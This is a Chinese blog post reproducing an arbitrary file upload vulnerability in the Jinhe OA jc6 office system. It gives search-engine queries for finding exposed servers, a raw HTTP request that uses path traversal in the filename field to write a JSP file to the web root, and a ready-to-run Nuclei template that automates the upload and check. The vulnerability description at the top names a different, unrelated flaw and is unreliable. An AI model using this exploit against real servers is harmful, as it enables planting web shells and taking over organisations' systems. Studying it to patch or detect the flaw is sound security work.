【漏洞复现】金和OA 任意文件上传

于 2024-06-28 17:16:57 发布
阅读量407 收藏 1
点赞数 1
文章标签: 漏洞挖掘 渗透 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80127209/article/details/140049021
版权

【产品介绍】

金和OA协同办公管理系统C6软件(简称金和OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。

【漏洞介绍】

金和OA sap-b1config-aspx接口存在未授权,攻击者可通过此漏洞获取敏感信息。

【资产测绘Query】

Fofa语法:app=”金和网络-金和OA”

Hunter语法:app.name=”金和 OA”

【产品界面】

【漏洞复现】

 

  1. POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
  2. Host: 127.0.0.1
  3. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  6. Accept-Encoding: gzip, deflate
  7. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  8. Connection: close
  9. Content-Length: 444
  11. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  12. Content-Disposition: form-data; name="filename"
  14. ../../../../upload/123.jsp
  15. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  16. Content-Disposition: form-data; name="upLoadFile"; filename="a.jpg"
  17. Content-Type: image/jpeg
  19. <% out.println("Hello, World!"); %>
  20. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  21. Content-Disposition: form-data; name="Submit"
  23. upload
  24. ------WebKitFormBoundary5iALAXlSiqxJXrhK--
 

 

 


 成功上传,访问路径upload/123.jsp
 

 

【Nuclei-Poc】
 

 

  1. id: example-file-upload
  3. info:
  4. name: Example File Upload
  5. author: your-name
  6. severity: high
  8. requests:
  9. - raw:
  10. - |
  11. POST /jc6/ntkoUpload/ntko-upload!upload.action HTTP/1.1
  12. Host: {{Hostname}}
  13. Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5iALAXlSiqxJXrhK
  14. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  15. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  16. Accept-Encoding: gzip, deflate
  17. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
  18. Connection: close
  20. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  21. Content-Disposition: form-data; name="filename"
  23. ../../../../upload/test.jsp
  24. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  25. Content-Disposition: form-data; name="upLoadFile"; filename="test.jpg"
  26. Content-Type: image/jpeg
  28. <% out.println("Hello, World!"); %>
  29. ------WebKitFormBoundary5iALAXlSiqxJXrhK
  30. Content-Disposition: form-data; name="Submit"
  32. upload
  33. ------WebKitFormBoundary5iALAXlSiqxJXrhK--
  34. - |
  35. GET /upload/test.jsp HTTP/1.1
  36. Host: {{Hostname}}
  37. Accept: */*
  38. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.67
  40. matchers-condition: and
  41. matchers:
  42. - type: word
  43. words:
  44. - "Hello, World!"
  45. part: body
  47. - type: status
  48. status:
  49. - 200
 

【验证】
 

.\nuclei -l 1.txt -t 6.yaml
 

 

 

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

                

        

        

    

  


    

      

        

            

              
                
                  运维Z叔
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
OA任意文件读取漏洞

				
			

			

				

					xiaokp7的博客
				

				

					09-13
					
					511
					
				

			

		

		

			
				
OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用OA系统存在任意文件读取漏洞,攻击者通过恶意构造的请求下载服务器上的任意文件,包括敏感文件、配置文件、数据库文件等。

			
		

	



                

              
                



	

		

			

				
					
OA jc6 任意文件上传漏洞复现

				
			

			

				

					0xSec
				

				

					11-12
					
					1453
					
				

			

		

		

			
				
OA jc6系统saveAsOtherFormatServlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可利用此漏洞上传恶意后门文件,最终可导致服务器失陷。

			
		

	



                


  
              

                


	

		

			

				
					
漏洞复现-OA系列

				
			

			

				

					aming小老弟
				

				

					03-14
					
					1128
					
				

			

		

		

			
				
|| banner=“Path=/jc6OA协同办公管理系统C6软件(简称OA),本着简单、适用、高效的原则,贴合企事业单位的实际需求,实行通用化、标准化、智能化、人性化的产品设计,充分体现企事业单位规范管理、提高办公效率的核心思想,为用户提供一整套标准的办公自动化解决方案,以帮助企事业单位迅速建立便捷规范的办公环境。app=“和网络-OA”||body=“/jc6/platform/sys/login”请联系厂家 http://www.jinher.com/升级。

			
		

	





	

		

			

				
					
OA-jc6-UploadFileBlock任意文件上传漏洞

				
			

			

				

					qq_36334672的博客
				

				

					02-04
					
					260
					
				

			

		

		

			
				
OA jc6系统UploadFileBlock接口处存在任意文件上传漏洞,恶意攻击者可能利用此漏洞上传恶意文件,最终导致服务器失陷。

			
		

	



		

			
		



	

		

			

				
					
复现OA协同管理平台 任意文件上传漏洞_20

				
			

			

				

					fushuang333的博客
				

				

					01-16
					
					729
					
				

			

		

		

			
				
复现OA协同管理平台 任意文件上传漏洞和C6协同管理平台包括协同办公管理,人力资源管理,项目管理,客户关系管理,企业目标管理,费用管理,移动办公,微信办公等多个业务范围

			
		

	





	

		

			

				
					
OA Servlet接口任意文件上传漏洞

				
			

			

				

					败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
				

				

					12-06
					
					783
					
				

			

		

		

			
				
和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

			
		

	





	

		

			

				
					
OA系统漏洞记录

				
			

			

				

					Aquarius_ego的博客
				

				

					05-14
					
					4873
					
				

			

		

		

			
				
OA系统介绍及相关漏洞(不断更新哦~)

			
		

	





	

		

			

				
					
OA_jc6_viewConTemplate.action存在FreeMarker模板注入漏洞

				
			

			

				

					qq_36334672的博客
				

				

					03-30
					
					193
					
				

			

		

		

			
				
OA-jc6-viewConTemplate.action接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。

			
		

	





	

		

			

				
					
漏洞复现OA任意文件读取漏洞

				
			

			

				

					晚风不及你
				

				

					12-18
					
					641
					
				

			

		

		

			
				
和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

			
		

	





	

		

			

				
					
OA C6 FileDownLoad.aspx 任意文件读取漏洞复现

				
			

			

				

					0xSec
				

				

					05-09
					
					731
					
				

			

		

		

			
				
OA C6 FileDownLoad.aspx接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

			
		

	





	

		

			

				
					
漏洞复现OA C6任意文件读取漏洞

				
			

			

				

					失心少年
				

				

					09-08
					
					1105
					
				

			

		

		

			
				
OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断地更新完善,全面支撑企业发展,提供专业oa,oa系统,oa办公系统,办公自动化软件,协同办公管理系统.支持oa办公自动化系统免费在线试用。该OA C6系统的download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器的敏感信息。

			
		

	





	

		

			

				
					
12306抢票脚本 - Bypass

					
最新发布

				
			

			

				

					09-17
				

			

		

		

			
				
12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306抢票脚本12306

			
		

	





	

		

			

				
					
单片机与蓝牙模块的无线通信项目实战.md

				
			

			

				

					09-17
				

			

		

		

			
				
如何使用单片机与蓝牙模块(如HC-05/HC-06)实现无线通信的详细步骤。首先,介绍了蓝牙模块的基本工作原理、引脚功能及配置方法。接着,讲解了硬件设计,包括单片机与蓝牙模块的连接、按键与LED模块的接线。然后,详细描述了软件设计,包括串口通信的初始化、蓝牙模块的数据接收与处理。项目调试部分涉及蓝牙连接的测试、串口通信的验证及功能调试,确保系统稳定运行。最后,探讨了项目的扩展可能性,如双向通信、多个设备通信及低功耗设计。这些内容为构建一个基于单片机和蓝牙的无线通信系统提供了全面的指导。

			
		

	





	

		

			

				
					
计算机科学中的基数排序算法原理与实现

				
			

			

				

					09-17
				

			

		

		

			
				
本文详细介绍了基数排序这一非比较型排序方法的算法原理以及其在实际应用中如何操作。从初始化桶到最后重构阵列的每一步均进行了阐述,并提供了基于Python的实现例子。另外,对基数排序的时间和空间复杂度给出了深入解析及其使用情境说明,有助于了解排序机制并正确评估算法性能优劣。
适合人群:具备基本算法基础的数据科学家,研究和开发人员。
使用场景及目标:帮助理解和学习基数排序的技术要点和内在逻辑,掌握其实现在固定长度整数集合上进行快速排序的操作技巧。
其它提示:尽管该排序方法在特定条件下效率显著高于比较式方法,但须谨慎应用于数据种类变化多样的环境中。


			
		

	





	

		

			

				
					
Python100道题(100).zip

				
			

			

				

					09-17
				

			

		

		

			
				
基数排序

			
		

	





	

		

			

				
					
基于大语言模型的智能体架构设计模式

				
			

			

				

					09-17
				

			

		

		

			
				
本文档提出了一套由18种架构设计模式组成的设计模式目录,旨在指导从事基础模型(FM)驱动的人工智能(GenAI)开发的研究者与实践者们有效地克服现有挑战。它涵盖了被动目标创建者、主动目标创建者以及投票合作等多角度的解决方案,并详细讨论了每个设计模式的具体应用背景与解决相关问题的能力,从而支持基于FM的技术创新和发展,为实现自主型任务导向智能体提供坚实的理论基础和技术支持。适用于所有对智能体开发感兴趣的人群。
适合人群:具有一定编程基础且关注于智能体系统开发的研究员、软件设计师及开发者。
使用场景及目标:帮助相关人员深入理解当前先进基于基础模型的智能体发展趋势,在实际项目实践中更好地应对智能体的目标制定与行为规划方面的各种复杂情况。
额外说明:本研究不仅限于具体的技术实现细节,更多地强调从高层次视角探索设计思路和策略,促进跨学科协作及知识积累共享。


			
		

	





	

		

			

				
					
gradle61all000001

				
			

			

				

					09-17
				

			

		

		

			
				
gradle61all000001

			
		

	





	

		

			

				
					
oa jc6 ntko-upload 任意文件上传漏洞

				
			

			

				

					01-16
				

			

		

		

			
				
OA JC6是一套企业办公协同软件,用于企业内部的办公流程管理与协同办公。而NTKO-Upload是OA JC6中的一个模块,用于用户在办公过程中上传文件进行共享和交流。

然而,OA JC6和NTKO-Upload存在一个任意文件上传漏洞。该漏洞可能会被恶意攻击者利用,上传恶意文件,从而对系统造成潜在的安全风险。

恶意上传的文件可能包含恶意代码、病毒或其他有害的文件,攻击者可通过这些文件获取系统权限、窃取敏感信息、篡改数据等。由于OA JC6广泛应用于企业内部,一旦该漏洞被利用,可能会对企业的信息安全带来严重威胁。

为了防止利用这个漏洞进行任意文件上传的攻击,建议用户采取以下措施:

1. 及时升级OA JC6和NTKO-Upload软件,确保软件的最新版本中修复了该漏洞。
2. 对OA JC6和NTKO-Upload进行适当的安全配置,禁用或限制用户上传的文件类型和大小,只允许上传安全可信的文件。
3. 定期进行系统漏洞扫描和安全评估,及时发现并修复可能存在的漏洞。
4. 配置防火墙和入侵检测系统,及时发现和阻止恶意上传行为。
5. 培训企业员工,提高其安全意识,警惕不明文件的上传和下载。

总之,任意文件上传漏洞OA JC6和NTKO-Upload的安全构成潜在威胁,为保护企业信息安全,必须采取相应的安全防护措施,并保持软件的更新和维护。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值